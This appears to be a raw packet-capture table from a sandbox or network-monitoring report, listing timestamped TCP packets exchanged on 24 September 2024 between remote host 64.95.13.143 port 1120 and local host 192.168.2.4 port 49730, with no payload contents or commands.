Sep 24, 2024 17:46:13.064439058 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:13.064452887 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:13.064466000 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:13.064477921 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:13.064487934 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:13.064500093 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:13.064505100 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:13.064517975 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:13.064529896 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:13.064543962 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:13.064553976 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:13.064564943 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:13.064578056 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:13.064587116 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:13.064599991 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:13.064606905 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:13.064620018 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:13.064631939 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:13.064641953 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:13.064651966 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:13.064667940 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:13.064680099 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:13.064716101 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:13.065989971 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:13.066139936 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:13.066152096 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:13.066168070 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:13.066179037 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:13.066190958 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:13.066214085 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:13.066315889 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:13.066329002 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:13.066360950 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:13.073077917 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:13.073101997 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:13.073117018 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:13.073147058 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:13.073158026 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:13.073177099 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:13.073189974 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:13.073203087 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:13.073215961 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:13.073237896 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:13.073250055 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:13.074064016 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:13.074075937 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:13.074089050 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:13.074100971 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:13.074112892 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:13.074124098 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:13.074136019 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:13.074148893 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:13.074157000 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:13.074171066 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:13.074661016 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:13.074672937 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:13.074685097 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:13.074697971 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:13.074704885 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:13.074713945 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:13.074723959 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:13.074736118 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:13.074748039 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:13.074759007 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:13.074779034 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:13.123797894 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:13.123811007 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:13.123822927 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:13.123837948 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:13.123852015 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:13.123866081 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:13.123883963 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:13.123892069 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:13.123924017 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:13.123979092 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:13.124025106 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:13.146058083 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:13.146153927 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:13.146166086 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:13.146209955 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:13.146241903 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:13.146253109 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:13.146264076 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:13.146279097 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:13.146291018 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:13.146312952 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:13.146435022 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:13.146478891 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:13.150054932 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:13.150067091 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:13.150079012 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:13.150118113 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:13.150213957 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:13.150227070 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:13.150238037 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:13.150253057 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:13.150260925 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:13.150269985 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:13.150542974 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:13.150583982 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:13.150594950 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:13.150607109 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:13.150645971 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:13.150706053 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:13.150718927 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:13.150731087 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:13.150743961 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:13.150753975 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:13.150780916 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:13.150949955 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:13.150960922 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:13.150966883 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:13.150974035 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:13.151056051 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:13.151143074 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:13.151164055 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:13.151175022 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:13.151201010 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:13.151441097 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:13.151452065 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:13.151464939 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:13.151485920 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:13.151501894 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:13.151541948 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:13.151552916 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:13.151565075 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:13.151578903 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:13.151587963 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:13.151622057 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:13.151675940 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:13.151690006 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:13.151700974 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:13.151726961 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:13.151835918 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:13.151845932 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:13.151856899 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:13.151870966 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:13.151875973 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:13.151890993 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:13.151896954 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:13.151937962 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:13.152117014 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:13.152128935 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:13.152138948 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:13.152163982 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:13.152184010 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:13.152195930 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:13.152208090 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:13.152219057 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:13.152228117 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:13.152240038 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:13.152247906 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:13.152276993 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:13.154145002 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:13.154156923 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:13.154170036 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:13.154194117 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:13.154686928 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:13.154697895 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:13.154710054 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:13.154723883 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:13.154730082 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:13.154741049 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:13.154748917 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:13.154788971 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:13.155342102 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:13.155399084 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:13.155411959 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:13.155500889 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:13.155534983 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:13.155545950 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:13.155558109 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:13.155567884 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:13.155586958 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:13.155595064 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:13.155608892 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:13.155633926 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:13.155647039 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:13.155656099 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:13.155680895 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:13.155847073 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:13.155868053 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:13.155917883 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:13.155927896 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:13.155939102 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:13.155972004 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:13.156052113 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:13.156061888 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:13.156081915 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:13.156090021 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:13.156100035 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:13.156138897 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:13.156162977 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:13.156174898 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:13.156205893 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:13.156294107 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:13.156305075 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:13.156344891 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:13.157557964 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:13.157617092 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:13.157628059 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:13.157656908 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:13.157830954 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:13.157847881 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:13.157860041 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:13.157871008 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:13.157879114 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:13.157891989 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:13.157902002 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:13.157928944 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:13.166129112 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:13.166141987 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:13.166153908 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:13.166191101 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:13.166205883 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:13.166244030 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:13.170459032 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:13.170470953 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:13.170481920 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:13.170495987 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:13.170507908 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:13.170516968 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:13.170536041 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:13.170593977 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:13.170604944 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:13.170617104 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:13.170631886 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:13.170639038 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:13.170646906 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:13.170656919 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:13.170670033 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:13.170682907 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:13.170692921 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:13.170703888 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:13.170717001 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:13.170734882 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:13.170742035 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:13.170749903 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:13.170759916 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:13.170773029 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:13.170793056 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:13.216346979 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:13.216386080 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:13.216398954 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:13.216425896 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:13.216444969 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:13.216458082 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:13.216466904 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:13.216479063 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:13.216495037 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:13.216532946 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:13.216584921 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:13.216661930 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:13.238862038 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:13.238888025 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:13.238900900 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:13.238934040 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:13.238950014 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:13.239084959 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:13.239099979 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:13.239113092 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:13.239125967 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:13.239140987 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:13.239151001 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:13.239160061 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:13.242583036 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:13.242635012 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:13.242660999 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:13.242674112 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:13.242707014 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:13.242785931 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:13.242796898 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:13.242860079 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:13.242901087 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:13.242913961 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:13.242944002 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:13.243243933 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:13.243256092 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:13.243268967 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:13.243304968 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:13.243376970 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:13.243397951 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:13.243413925 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:13.243419886 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:13.243432045 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:13.243448019 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:13.243458033 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:13.243484974 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:13.243619919 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:13.243710041 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:13.243721962 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:13.243733883 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:13.243742943 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:13.243755102 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:13.243771076 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:13.243781090 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:13.243815899 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:13.243963003 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:13.244043112 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:13.244055986 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:13.244069099 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:13.244080067 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:13.244090080 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:13.244106054 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:13.244112968 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:13.244152069 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:13.244462967 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:13.244473934 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:13.244487047 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:13.244508028 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:13.244515896 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:13.244529009 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:13.244540930 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:13.244554043 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:13.244563103 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:13.244573116 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:13.244584084 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:13.244618893 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:13.244734049 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:13.244827032 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:13.244839907 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:13.244853973 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:13.244863987 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:13.244874954 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:13.244888067 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:13.244896889 CEST	1120	49730	64.95.13.143	192.168.2.4
